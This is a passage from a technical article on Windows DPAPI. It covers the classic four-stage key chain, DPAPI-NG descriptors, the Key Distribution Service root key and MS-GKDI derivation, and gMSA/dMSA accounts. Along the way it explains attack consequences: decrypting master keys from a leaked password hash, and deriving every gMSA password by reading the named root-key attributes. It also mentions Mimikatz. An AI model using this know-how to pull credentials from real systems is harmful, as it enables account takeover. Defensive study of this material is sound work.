&lt;p&gt;A note on adjacent topics: the companion &lt;em&gt;Credential Guard&lt;/em&gt; article in this series covers the LSAISO trustlet&apos;s isolation boundary; the companion &lt;em&gt;VBS Trustlets&lt;/em&gt; [@paragmali-com-secure-kernel] article covers the trustlet model itself; the &lt;em&gt;TPM in Windows&lt;/em&gt; [@paragmali-com-the-c] article covers TPM-bound key storage providers; the &lt;em&gt;BitLocker on Windows&lt;/em&gt; [@paragmali-com-limits-of] article covers full-volume encryption; the &lt;em&gt;NTLMless&lt;/em&gt; [@paragmali-com-in-windows] article covers Kerberoasting and Golden Ticket disambiguation. Where we touch those topics, we touch them briefly and refer out -- the goal here is to make DPAPI&apos;s chain legible from &lt;code&gt;CryptProtectData&lt;/code&gt; all the way to the four-phase &lt;code&gt;GoldenDMSA&lt;/code&gt; pipeline.&lt;/p&gt;
&lt;p&gt;If you can read those six files in Alice&apos;s &lt;code&gt;Protect&lt;/code&gt; directory and you have her password&apos;s SHA-1 hash, you have everything Windows ever encrypted for her. The next eleven sections explain why -- and why the 2012 redesign that was supposed to fix it produced a new ceiling that, by 2022, turned out to be even harder to live with.&lt;/p&gt;
&lt;h2&gt;2. Why Windows 2000 Needed a Credential Vault: Generation 0 and Generation 1&lt;/h2&gt;
&lt;p&gt;Three years before DPAPI shipped, an attacker with a logged-in user&apos;s session could read every Internet Explorer auto-complete password, every Outlook Express account password, every saved-FTP credential, and every dial-up RAS phonebook entry on the machine -- without breaking any cryptography. The late-1990s reversing tradition (the original &lt;code&gt;pwdump&lt;/code&gt;, &lt;em&gt;L0phtCrack&lt;/em&gt;, Cain &amp;amp; Abel&apos;s &quot;Protected Storage PassView,&quot; the ad-hoc Outlook Express and IE 4 form-fill stealers documented across Bugtraq and ntbugtraq mailing lists at the time) defeated all of it uniformly. The &quot;encryption&quot; applications used was honoured by the OS, faithfully, for the attacker&apos;s process as for the legitimate one -- because there was no system primitive that distinguished one from the other. Each application baked its own key into the binary; every reverser who pulled the binary apart pulled the key out with it.&lt;/p&gt;

The system-provided per-user and per-machine secret-storage primitive that ships in every Windows release from Windows 2000 onward [@wikipedia-dpapi]. The classic API surface is two flat-C functions -- `CryptProtectData` [@ms-cryptprotectdata] and `CryptUnprotectData` -- that take a plaintext, an optional caller entropy parameter, and return a self-contained opaque BLOB. The cryptographic chain inside those two functions is rooted at the user&apos;s login password and is what every &quot;encrypted&quot; Windows secret of the next 25 years sits on top of.
&lt;p&gt;If the attacker is the user&apos;s session, what does &quot;encrypt this for the user&quot; even mean? That is the question every Generation 0 design dodged and every modern credential-vault design has to answer head-on. The 1990s answer (XOR-with-a-baked-in-key) and Microsoft&apos;s first attempt at a real system primitive (Protected Storage / PStore) both missed the same point in different ways.&lt;/p&gt;
&lt;h3&gt;Generation 1: Protected Storage&lt;/h3&gt;
&lt;p&gt;Protected Storage shipped with Internet Explorer 4 and stayed in the OS until Microsoft formally deprecated it. The &lt;code&gt;pstore.dll&lt;/code&gt; [@ms-pstore] item taxonomy is a four-tuple &lt;code&gt;(Key, Type, Subtype, Name)&lt;/code&gt; -- a folder hierarchy of named secret entries. The API was the first system-level secret store on Windows that any application could use without writing its own key derivation; the conceptual contribution survived even after the implementation was abandoned.&lt;/p&gt;
&lt;p&gt;PStore had two ideas the post-Vista world kept and one it dropped. The two it kept: secrets live in a &lt;em&gt;system primitive&lt;/em&gt;, not in each application; secrets are addressed by &lt;em&gt;name&lt;/em&gt;, not by raw key handle. The one it dropped: an &lt;em&gt;Authenticode access-rule&lt;/em&gt; clause that would have bound a stored item to the signing identity of the application that created it. No application ever used the access-rule clause in production. Microsoft&apos;s developer notes are blunt about how the story ended: &lt;em&gt;&quot;Pstore uses an older implementation of data protection. Developers are strongly encouraged to take advantage of the stronger data protection provided by the &lt;code&gt;CryptProtectData&lt;/code&gt; [@ms-cryptprotectdata] and &lt;code&gt;CryptUnprotectData&lt;/code&gt; functions&quot;&lt;/em&gt;; PStore is &lt;em&gt;&quot;only available for read-only operations in Windows Server 2008 and Windows Vista, but may be unavailable in subsequent versions.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The PStore code-identity-pinning idea (Authenticode access rules) was abandoned in 2000 and re-invented twenty-six years later by Chromium 2024 app-bound encryption, which we will reach in §10.3.&lt;/p&gt;
&lt;h3&gt;What survived into DPAPI&lt;/h3&gt;
&lt;p&gt;The Generation 2 design that shipped with Windows 2000 in February 2000 made four moves at once. It kept the two PStore ideas worth keeping (&quot;system-level, not per-application&quot; and &quot;secret addressed by structured name&quot;). It dropped the unused Authenticode access-rule clause. It pushed the cryptographic chain down to a key derived directly from the user&apos;s login password. And it added a domain-recovery sidecar (the BackupKey Remote Protocol [@ms-bkrp-landing], which we open in §5) so managed enterprises would adopt it.&lt;/p&gt;
&lt;p&gt;The canonical first public design document [@learn-microsoft-com-versions-ms995355vmsdn10]) -- NAI Labs / Network Associates&apos; &lt;em&gt;&quot;Windows Data Protection&quot;&lt;/em&gt; whitepaper, MSDN ms995355, October 2001 -- is unambiguous about the layering: &lt;em&gt;&quot;DPAPI initially generates a strong key called a MasterKey, which is protected by the user&apos;s password. DPAPI uses a standard cryptographic process called Password-Based Key Derivation, described in PKCS #5, to generate a key from the password.&quot;&lt;/em&gt; And: &lt;em&gt;&quot;DPAPI is a password-based data protection service. It requires a password to provide protection.&quot;&lt;/em&gt;Some secondary sources attribute a &quot;Microsoft Windows Data Protection API&quot; whitepaper to Niels Ferguson at &lt;code&gt;niels.ferguson.com/research/dpapi.html&lt;/code&gt;. That URL has been TCP-unreachable for years, has zero Wayback captures across four candidate variants, and the Wikipedia &lt;em&gt;Niels Ferguson&lt;/em&gt; article [@wikipedia-niels-ferguson] lists no DPAPI publication for him -- his named Microsoft paper is the 2006 BitLocker / Elephant-diffuser paper, not anything DPAPI-related. The verifiable Microsoft-blessed first design document is the NAI Labs ms995355 whitepaper [@learn-microsoft-com-versions-ms995355vmsdn10]).&lt;/p&gt;
&lt;p&gt;The two-function flat-C API Microsoft shipped with Windows 2000 in February 2000 is what every Windows secret of the next 25 years has been encrypted with. The four-stage chain it hides behind those two function names is what we open up next.&lt;/p&gt;
&lt;h2&gt;3. The Four-Stage Chain: How &lt;code&gt;CryptProtectData&lt;/code&gt; Actually Encrypts&lt;/h2&gt;
&lt;p&gt;A &lt;code&gt;CryptProtectData&lt;/code&gt; [@ms-cryptprotectdata] call goes in with a plaintext buffer and an optional entropy parameter; out comes a self-contained opaque BLOB whose header adds roughly 100-150 bytes to the plaintext (the exact size depends on the algorithm choice and the master-key GUID encoding; the field-by-field BLOB layout is documented in the Bursztein-Picod 2010 paper [@bursztein-paper-pdf] and parsed by the Mimikatz &lt;code&gt;dpapi::blob&lt;/code&gt; [@mimikatz-dpapi-wiki] module). There is no &lt;code&gt;pszProvider&lt;/code&gt; argument, no &lt;code&gt;hKey&lt;/code&gt;, no algorithm choice exposed to the caller. Behind those two parameters is a four-stage cryptographic chain that has been the same shape for a quarter-century. Each stage takes the previous stage&apos;s output and one new input; the &lt;em&gt;only&lt;/em&gt; secret in the entire chain that an offline attacker has to guess is the user&apos;s password.&lt;/p&gt;

flowchart TD
    Password[&quot;User password&quot;] --&amp;gt; NTHash[&quot;NT hash&lt;br /&gt;(MD4 of UTF-16LE password)&quot;]
    NTHash --&amp;gt; Sha1NT[&quot;SHA-1(NT hash)&quot;]
    SID[&quot;User SID&lt;br /&gt;(UTF-16LE)&quot;] --&amp;gt; PBKDF2
    Sha1NT --&amp;gt; PBKDF2[&quot;Stage 1: PBKDF2&lt;br /&gt;(HMAC-SHA1 / HMAC-SHA512)&quot;]
    PBKDF2 --&amp;gt; PreKey[&quot;Pre-key&quot;]
    MK[&quot;Stage 2: Master key&lt;br /&gt;(64 random bytes)&quot;] --&amp;gt;|encrypted under| AESCBC[&quot;version-cipher wrap (AES-CBC on Win7+)&quot;]
    PreKey --&amp;gt; AESCBC
    AESCBC --&amp;gt; MKFile[&quot;%APPDATA%/Microsoft/Protect/&amp;lt;SID&amp;gt;/&amp;lt;GUID&amp;gt;&quot;]
    MK --&amp;gt; SessionKey[&quot;Stage 3: Session key&lt;br /&gt;HMAC(MK, salt || entropy)&quot;]
    SessionKey --&amp;gt; Wrap[&quot;Stage 4: BLOB wrap&lt;br /&gt;(3DES or AES-256, salt, HMAC)&quot;]
    Plaintext[&quot;Plaintext&quot;] --&amp;gt; Wrap
    Wrap --&amp;gt; Blob[&quot;DPAPI BLOB&quot;]
&lt;h3&gt;Stage 1: Pre-key derivation&lt;/h3&gt;
&lt;p&gt;The pre-key is a function of three values. The user-account password (or its NT-hash equivalent, supplied by &lt;code&gt;LSASS&lt;/code&gt; to the local DPAPI provider) is hashed with SHA-1; the SHA-1 result is fed into PBKDF2 as the input keying material; the user&apos;s security identifier (SID) [@learn-microsoft-com-versions-ms995355vmsdn10]) UTF-16LE-encoded is the salt; and a Windows-version-dependent iteration count completes the call. The output is a fixed-width pre-key that Stage 2 will use to wrap the master key.&lt;/p&gt;
&lt;p&gt;The chain has changed &lt;em&gt;parameters&lt;/em&gt; across Windows versions but has kept the four-stage &lt;em&gt;shape&lt;/em&gt; since 2000. The Passcape master-key analysis table [@passcape-master-key-analysis] records the migration verbatim:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Windows version&lt;/th&gt;
&lt;th&gt;Symmetric cipher&lt;/th&gt;
&lt;th&gt;HMAC&lt;/th&gt;
&lt;th&gt;PBKDF2 iterations&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows 2000&lt;/td&gt;
&lt;td&gt;RC4&lt;/td&gt;
&lt;td&gt;SHA-1&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows XP&lt;/td&gt;
&lt;td&gt;3DES&lt;/td&gt;
&lt;td&gt;SHA-1&lt;/td&gt;
&lt;td&gt;4 000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Vista&lt;/td&gt;
&lt;td&gt;3DES&lt;/td&gt;
&lt;td&gt;SHA-1&lt;/td&gt;
&lt;td&gt;24 000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 7&lt;/td&gt;
&lt;td&gt;AES-256&lt;/td&gt;
&lt;td&gt;SHA-512&lt;/td&gt;
&lt;td&gt;5 600&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 10 / 11&lt;/td&gt;
&lt;td&gt;AES-256&lt;/td&gt;
&lt;td&gt;SHA-512&lt;/td&gt;
&lt;td&gt;8 000&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The shift from PBKDF2-HMAC-SHA1 / 3DES (Windows 2000 -- Vista) to PBKDF2-HMAC-SHA512 / AES-256 (Windows 7 onward) happened at Windows 7, not Windows 10; Bursztein and Picod&apos;s 2010 USENIX WOOT paper [@usenix-woot10] documented the SHA-1/3DES era through Windows 7 (the Black Hat DC 2010 talk and WOOT paper covered XP&apos;s 4,000-iteration regime and Vista&apos;s 24,000-iteration regime; Windows 7&apos;s PBKDF2-SHA512/AES-256 shift had only recently shipped when the research was finalised).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 8 000 iterations of HMAC-SHA-512 is not strong against a modern wordlist attack on a leaked NT hash. Cumulative updates can raise the iteration count further; the actual count is recorded in the master-key file&apos;s header and is not implicit. When you read someone&apos;s master key, read the iteration count from the file -- do not assume.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Stage 2: The master key&lt;/h3&gt;
&lt;p&gt;The &lt;em&gt;master key&lt;/em&gt; is a 64-byte cryptographically random secret; one is generated per user, on first use of DPAPI, and a fresh one is generated every 90 days by default. Master keys live as files inside &lt;code&gt;%APPDATA%\Microsoft\Protect\&amp;amp;lt;SID&amp;amp;gt;\&amp;amp;lt;GUID&amp;amp;gt;&lt;/code&gt;, where the GUID is the master-key identifier embedded in every BLOB that uses it. The file begins with a service header (containing the iteration count and algorithm IDs) followed by four distinct slots: (1) the user-master-key blob (encrypted under the Stage 1 pre-key with the version-dependent cipher -- RC4 on Windows 2000, 3DES on XP through Vista, AES-256-CBC on Windows 7 and later); (2) the local-encryption-key slot; (3) the local-backup-key (Windows 2000) or CREDHIST GUID (Windows XP and later); and (4) the domain-backup-key blob [@ms-bkrp-landing] (encrypted to the DC&apos;s backup public key, see §5).&lt;/p&gt;

A 64-byte random secret per user, persisted as a file under `%APPDATA%\Microsoft\Protect\&amp;lt;SID&amp;gt;\&amp;lt;GUID&amp;gt;`, encrypted under a pre-key derived from the user&apos;s password and SID. Every DPAPI BLOB the user ever creates is wrapped under a session key derived from one of these master keys. Master keys rotate every 90 days by default per the NAI Labs design document [@learn-microsoft-com-versions-ms995355vmsdn10]) and the Passcape master-key analysis [@passcape-master-key-analysis], but old master keys remain on disk so old BLOBs can still be decrypted.
&lt;h3&gt;Stage 3: The per-call session key&lt;/h3&gt;
&lt;p&gt;For every call to &lt;code&gt;CryptProtectData&lt;/code&gt;, DPAPI generates a fresh per-blob salt, computes an HMAC of the master key with the salt and the optional caller entropy, and uses that HMAC as the session key for the actual symmetric encryption. The session key is never stored; it is derivable from (master key, salt, entropy) at unwrap time per the Bursztein-Picod 2010 paper [@bursztein-paper-pdf] §3.3 and the Mimikatz &lt;code&gt;dpapi::blob&lt;/code&gt; parser [@mimikatz-dpapi-wiki]. The salt is in the BLOB header; the entropy, if any, must be supplied by the caller at unwrap time.&lt;/p&gt;
&lt;h3&gt;Stage 4: The BLOB wrap&lt;/h3&gt;
&lt;p&gt;The output BLOB is a self-describing structure with a fixed header. The provider GUID &lt;code&gt;{df9d8cd0-1501-11d1-8c7a-00c04fc297eb}&lt;/code&gt; identifies it as a classic-DPAPI blob; the master-key GUID names the master key under which it was wrapped; an &lt;code&gt;algCrypt&lt;/code&gt; algorithm identifier records which symmetric cipher was used (&lt;code&gt;0x6603&lt;/code&gt; for &lt;code&gt;CALG_3DES&lt;/code&gt; on legacy builds, &lt;code&gt;0x6610&lt;/code&gt; for &lt;code&gt;CALG_AES_256&lt;/code&gt; on later builds); the salt, ciphertext, and HMAC fill the rest. The Mimikatz &lt;code&gt;dpapi&lt;/code&gt; module wiki [@mimikatz-dpapi-wiki] documents the verbatim field layout that every offline DPAPI tool parses to this day.&lt;/p&gt;

The `algCrypt` field in the DPAPI BLOB header is a CryptoAPI algorithm identifier from `wincrypt.h`: `0x6603` is `CALG_3DES` (the historical default, encoded as `ALG_CLASS_DATA_ENCRYPT | ALG_TYPE_BLOCK | ALG_SID_3DES`); `0x6610` is `CALG_AES_256` (used on Windows 7 and later, encoded as `ALG_CLASS_DATA_ENCRYPT | ALG_TYPE_BLOCK | ALG_SID_AES_256`). The provider GUID `{df9d8cd0-1501-11d1-8c7a-00c04fc297eb}` is the magic constant that marks every classic-DPAPI BLOB and is the same value the Mimikatz `dpapi::blob` module [@mimikatz-dpapi-wiki] and the Bursztein-Picod 2010 paper [@bursztein-paper-pdf] §3.3.1 print when they parse one.
&lt;p&gt;{`&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Parse --&amp;gt; Cert&amp;amp;#123;&quot;CERTIFICATE=&quot;&amp;amp;#125;
Parse --&amp;gt; Local&amp;amp;#123;&quot;LOCAL=&quot;&amp;amp;#125;
Parse --&amp;gt; Web&amp;amp;#123;&quot;WEBCREDENTIALS=&quot;&amp;amp;#125;
Sid --&amp;gt; KSP[&quot;Microsoft Key Protection Provider&amp;lt;br/&amp;gt;+ kdssvc.dll [MS-GKDI]&quot;]
Cert --&amp;gt; CertKSP[&quot;Cert&apos;s KSP&amp;lt;br/&amp;gt;(TPM-backed possible)&quot;]
Local --&amp;gt; LocalProv[&quot;Microsoft Key Protection Provider&amp;lt;br/&amp;gt;(LOCAL=user / LOCAL=machine)&quot;]
Web --&amp;gt; Broker[&quot;Microsoft Client Key Protection Provider&amp;lt;br/&amp;gt;(credential broker)&quot;]
KSP --&amp;gt; Wrap
CertKSP --&amp;gt; Wrap
LocalProv --&amp;gt; Wrap
Broker --&amp;gt; Wrap
Wrap[&quot;Derive wrapping key,&amp;lt;br/&amp;gt;encrypt content&quot;] --&amp;gt; Blob[&quot;Self-describing blob&amp;lt;br/&amp;gt;(descriptor + provider info&amp;lt;br/&amp;gt;+ key id + ciphertext + HMAC)&quot;]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output blob is self-describing per the protected-data-format reference [@ms-protected-data-format]: descriptor, provider info, key identifier, ciphertext, HMAC. Any device with a CNG implementation that can satisfy the descriptor decrypts. There is no out-of-band key shipping. There is no &quot;encrypt the blob and ship the key separately.&quot; The descriptor &lt;em&gt;is&lt;/em&gt; the key-distribution policy.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; DPAPI-NG separates &lt;em&gt;who can decrypt&lt;/em&gt; (the descriptor) from &lt;em&gt;where the key material lives&lt;/em&gt; (the provider). The descriptor is the contract; the provider is the implementation. This is the structural innovation that lets a blob protected on one machine be decrypted on another without any application-layer key-management code.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The CNG DPAPI overview page lists only &lt;em&gt;two&lt;/em&gt; principal classes -- AD group and web credentials -- whereas the protection-descriptors page enumerates three (adding the certificate-store class). Both are correct: the certificate descriptor maps to a different provider, hence the two-principal framing on the higher-level overview page and the three-keyword framing on the descriptors-grammar page.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;LOCAL=user&lt;/code&gt; and &lt;code&gt;CERTIFICATE=&lt;/code&gt; cases are interesting but mostly variations on themes that classic DPAPI or the Windows certificate store could already do. The case that required Microsoft to ship a new DC-side daemon -- the case that turned DPAPI-NG into the substrate for gMSAs [@ms-gmsa-overview], dMSAs [@ms-dmsa-overview], Hello for Business, and Credential Guard&apos;s persistence layer -- is the &lt;code&gt;SID=&lt;/code&gt; AD-group descriptor. The next section opens its substrate: the Microsoft Key Distribution Service and the &lt;code&gt;[MS-GKDI]&lt;/code&gt; protocol.&lt;/p&gt;
&lt;h2&gt;7. The Microsoft Key Distribution Service: How &lt;code&gt;[MS-GKDI]&lt;/code&gt; Computes the Same Group Key on Every DC Without Talking to Any of Them&lt;/h2&gt;
&lt;p&gt;Imagine a forest with seven writable domain controllers. A laptop in Singapore protects a DPAPI-NG blob with &lt;code&gt;SID=S-1-5-21-...XYZ&lt;/code&gt; (some AD group). Three months later, a phone in Seoul -- a member of the same group, on a different DC -- needs to decrypt it. Neither DC has ever heard of the blob. Both DCs derive &lt;em&gt;exactly the same group key&lt;/em&gt; and hand it to the requesting member. No inter-DC synchronisation. No key-distribution code in either application. The mechanism is one forest-wide root key plus a deterministic key-derivation function.&lt;/p&gt;

The DC-side daemon that ships in every writable domain controller from Windows Server 2012 onward [@wikipedia-winserver2012]. Implements the [`[MS-GKDI]` Group Key Distribution Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/943dd4f6-6b80-4a66-8594-80df6d2aad0a) (current revision class 10.0, April 2024) and is the substrate for every DPAPI-NG `SID=` blob, every gMSA password, every dMSA password, and the TPM-less software-KSP path of Windows Hello for Business. The service has one job: given a (group, time-period) request from a member computer, derive and return the per-(group, period) key from a single forest-wide root key.
&lt;h3&gt;Provisioning the root key&lt;/h3&gt;
&lt;p&gt;Every forest needs exactly one KDS root key before any DPAPI-NG &lt;code&gt;SID=&lt;/code&gt; consumer can use it. The PowerShell cmdlet &lt;code&gt;Add-KdsRootKey&lt;/code&gt; [@ms-add-kdsrootkey] is the provisioning entry point. The Microsoft Learn page is verbatim about the constraints: &lt;em&gt;&quot;The Add-KdsRootKey cmdlet generates a new root key for the Microsoft Group Key Distribution Service (KdsSvc) within Active Directory... It is required to run this only once per forest.&quot;&lt;/em&gt; The default &lt;code&gt;EffectiveTime&lt;/code&gt; is &lt;em&gt;&quot;10 days after the current date&quot;&lt;/em&gt; to allow Active Directory replication to converge across all writable DCs before any consumer tries to derive against the new key.The &lt;code&gt;Add-KdsRootKey -EffectiveTime ((Get-Date).AddHours(-10))&lt;/code&gt; override is for &lt;em&gt;single-DC test forests only&lt;/em&gt;. Production forests should let the 10-day default replicate; using the back-dated override means the first consumer to call into the KDS may target a DC that has not yet received the new root key from replication.&lt;/p&gt;
&lt;p&gt;The root key lives at &lt;code&gt;CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,CN=Configuration,&amp;lt;forest-DN&amp;gt;&lt;/code&gt; and carries four attributes that downstream offensive-research tools enumerate: &lt;code&gt;msKds-RootKeyData&lt;/code&gt; (the actual key bytes), &lt;code&gt;msKds-KDFAlgorithmID&lt;/code&gt; (the KDF identifier, currently SP800-108 HMAC-SHA512), &lt;code&gt;msKds-KDFParam&lt;/code&gt; (the KDF parameter block), and &lt;code&gt;msKds-PrivateKeyLength&lt;/code&gt;. These four attributes, together, are everything a deterministic-KDF derivation needs to recompute every group key the forest will ever produce.&lt;/p&gt;

The single forest-wide secret that anchors every per-(group, period) key the Microsoft Key Distribution Service will ever derive, for every DPAPI-NG `SID=` blob, every gMSA, every dMSA, every Hello-for-Business software-KSP container, and every Credential-Guard isolated-secret persistence wrap. Provisioned with `Add-KdsRootKey` [@ms-add-kdsrootkey], exactly once per forest. Stored as four attributes (`msKds-RootKeyData`, `msKds-KDFAlgorithmID`, `msKds-KDFParam`, `msKds-PrivateKeyLength`) under `CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,CN=Configuration,`. Currently, Microsoft documents no rotation procedure [@ms-cng-dpapi-backup-keys]; see §9.3.
&lt;h3&gt;The L0 / L1 / L2 derivation chain&lt;/h3&gt;
&lt;p&gt;The &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/943dd4f6-6b80-4a66-8594-80df6d2aad0a&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;[MS-GKDI]&lt;/code&gt; specification&lt;/a&gt; (current revision class 10.0, April 23 2024) describes the protocol. Internally, the KDS computes a three-level derivation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;L0 seed key&lt;/strong&gt;: derived from the root key and a label that includes the period-in-hours-thousands tier and the group-related input, via a NIST SP 800-108 KDF in counter mode using HMAC-SHA-512 (see NIST SP 800-108r1 [@nist-sp-800-108r1], August 2022).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;L1 seed key&lt;/strong&gt;: derived from L0 with a second-tier label.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;L2 seed key&lt;/strong&gt;: derived from L1 with the third-tier label. This is the actual symmetric key the DPAPI-NG blob&apos;s content key wraps under (or the seed for a per-period group ECDH key pair, in the public-key DPAPI-NG mode).&lt;/li&gt;
&lt;/ul&gt;

The first level of the [`[MS-GKDI]`](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/943dd4f6-6b80-4a66-8594-80df6d2aad0a) three-tier derivation chain. Computed deterministically from the KDS root key and a label that combines the time-period tier (in units of `period-in-hours / 1000`) and a group-related input. The whole point of the chain is that any DC that holds the same root key, given the same label, derives the same L0 seed key without coordination with any other DC -- which is also the whole reason a single root-key compromise compromises every key the forest will ever derive.

flowchart TD
    Root[&quot;KDS root key&lt;br /&gt;(forest-wide secret)&quot;] --&amp;gt; L0[&quot;L0 seed key&lt;br /&gt;(period_hours / 1000 + group input)&quot;]
    L0 --&amp;gt; L1[&quot;L1 seed key&lt;br /&gt;(second-tier label)&quot;]
    L1 --&amp;gt; L2[&quot;L2 seed key&lt;br /&gt;(third-tier label)&quot;]
    L2 --&amp;gt; Symmetric[&quot;Per-(group, period)&lt;br /&gt;symmetric key OR&lt;br /&gt;ECDH key-pair seed&quot;]
    KDF[&quot;SP800-108 counter-mode&lt;br /&gt;KDF, HMAC-SHA-512&quot;] -.derives.-&amp;gt; L0
    KDF -.derives.-&amp;gt; L1
    KDF -.derives.-&amp;gt; L2
&lt;h3&gt;The &lt;code&gt;GetKey&lt;/code&gt; round trip&lt;/h3&gt;
&lt;p&gt;A member computer&apos;s local KDS-NG provider calls the &lt;code&gt;GetKey&lt;/code&gt; RPC (the primary opnum of &lt;code&gt;[MS-GKDI]&lt;/code&gt;) against any reachable writable DC. The DC computes the L0/L1/L2 chain on demand and returns the per-(group, period) key material. No inter-DC synchronisation is needed because the KDF is deterministic.&lt;/p&gt;

sequenceDiagram
    participant Member as &quot;Member computer (Microsoft Key Protection Provider)&quot;
    participant DC as &quot;Nearest writable DC (kdssvc.dll)&quot;
    participant Root as Root key (AD-replicated)
    Member-&amp;gt;&amp;gt;DC: GetKey(group_sid, period_id)
    DC-&amp;gt;&amp;gt;Root: Read msKds-RootKeyData + KDF params
    Root--&amp;gt;&amp;gt;DC: Root-key material
    DC-&amp;gt;&amp;gt;DC: Compute L0(period, group) -&amp;gt; L1 -&amp;gt; L2
    DC--&amp;gt;&amp;gt;Member: Per-(group, period) key material
    Member-&amp;gt;&amp;gt;Member: Wrap (or unwrap) DPAPI-NG blob

Because the KDF is deterministic by design -- this is exactly the security property NIST SP 800-108r1 [@nist-sp-800-108r1] §5 establishes -- an attacker who reads the four root-key attributes once can derive every per-(group, period) key the KDS will ever produce, *for that root key*, without further DC interaction. The same property that lets a Singapore laptop and a Seoul phone derive the same key without talking to each other lets an attacker who reads the root key derive every gMSA password the forest will ever issue. This is the same property that makes Golden gMSA [@semperis-golden-gmsa] work in §10.
&lt;p&gt;Every DC in the forest runs the same &lt;code&gt;kdssvc.dll&lt;/code&gt; over the same root key with the same KDF; every authorised member of the named group can ask any DC for the per-(group, period) key and receive the same answer. The architecture is elegant. It is also, by structural necessity, the architecture that makes a one-shot read of the root key into a one-shot compromise of every key the forest will ever derive. Hold that thought; it is what §10 is built on. First we look at what actually rides on this substrate today.&lt;/p&gt;
&lt;h2&gt;8. The Four Things That Ride DPAPI-NG in 2026&lt;/h2&gt;
&lt;p&gt;One protocol, four production consumers. The same KDS root key that protects a &lt;code&gt;SID=&lt;/code&gt; DPAPI-NG blob is also the root from which every gMSA password, every dMSA password, every TPM-less Windows Hello private key, and every Credential Guard isolated NT-hash is derived.&lt;/p&gt;

A Windows-Server-2012-introduced Active Directory account class whose password is computed automatically by the Microsoft Key Distribution Service [@ms-gmsa-overview] on the DC, rotated every 30 days, 256 bytes long, and shared across multiple service hosts via the `msDS-GroupMSAMembership` SDDL gate. From the Microsoft Learn overview verbatim: *&quot;For a gMSA, the domain controller computes the password on the key that the Key Distribution Services provides, along with other attributes of the gMSA.&quot;* `Install-ADServiceAccount` on each member computer caches the derivation locally so the service can boot under the account.

flowchart TD
    Root[&quot;KDS root key&quot;] --&amp;gt; Chain[&quot;[MS-GKDI] L0/L1/L2 chain&quot;]
    Chain --&amp;gt; GMSA[&quot;gMSA password&lt;br /&gt;(30-day rotation,&lt;br /&gt;256 bytes)&quot;]
    Chain --&amp;gt; DMSA[&quot;dMSA password&lt;br /&gt;(machine-bound,&lt;br /&gt;Server 2025)&quot;]
    Chain --&amp;gt; WHfB[&quot;WHfB software-KSP&lt;br /&gt;(TPM-less devices,&lt;br /&gt;SID + device descriptor)&quot;]
    Chain --&amp;gt; CG[&quot;Credential Guard&lt;br /&gt;LsaIso-isolated secret&lt;br /&gt;(trustlet identity descriptor)&quot;]
&lt;h3&gt;8.1 Group Managed Service Accounts&lt;/h3&gt;
&lt;p&gt;gMSAs shipped in Windows Server 2012 (GA September 2012). The model: one AD account, multiple service hosts, no admin-managed password rotation, no per-service password file. The Microsoft Learn overview [@ms-gmsa-overview] is verbatim about the chain: &lt;em&gt;&quot;The Microsoft Key Distribution Service (kdssvc.dll) lets you securely obtain the latest key or a specific key with a key identifier for an Active Directory account... For a gMSA, the domain controller computes the password on the key that the Key Distribution Services provides, along with other attributes of the gMSA.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The constructed attribute that surfaces the password to authorised member computers is &lt;code&gt;msDS-ManagedPassword&lt;/code&gt; [@ms-ms-adts-managedpassword]; it is computed on demand by the DC from the KDS chain when an authorised member queries it. The authorisation gate is the &lt;code&gt;msDS-GroupMSAMembership&lt;/code&gt; security descriptor on the gMSA object: only principals whose SIDs satisfy that SDDL get the password back. Rotation is every 30 days. The password length is 256 bytes -- &lt;em&gt;&quot;a randomly generated password of 256 bytes, making it infeasible to crack&quot;&lt;/em&gt; per the Semperis Golden gMSA write-up [@semperis-golden-gmsa], which is true &lt;em&gt;if and only if&lt;/em&gt; the KDS root key is intact. We come back to that &lt;em&gt;if and only if&lt;/em&gt; in §10.&lt;/p&gt;
&lt;h3&gt;8.2 Delegated Managed Service Accounts&lt;/h3&gt;
&lt;p&gt;dMSAs shipped in Windows Server 2025 (GA November 1, 2024 [@wikipedia-winserver2025]). The same KDS chain; a different authorisation gate. Rather than binding to AD group membership, dMSA authentication binds to &lt;em&gt;machine identity&lt;/em&gt;: the Microsoft Learn overview [@ms-dmsa-overview] describes dMSAs as &lt;em&gt;&quot;a machine account with managed and fully randomized keys, while disabling original service account passwords. Authentication for dMSA is linked to the device identity, which means that only specified machine identities mapped in Active Directory (AD) can access the account.&quot;&lt;/em&gt; The &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; attribute carries a machine-binding component. Microsoft&apos;s marketing framing positions dMSA as the &quot;Kerberoast-immune&quot; replacement for static service accounts.&lt;/p&gt;
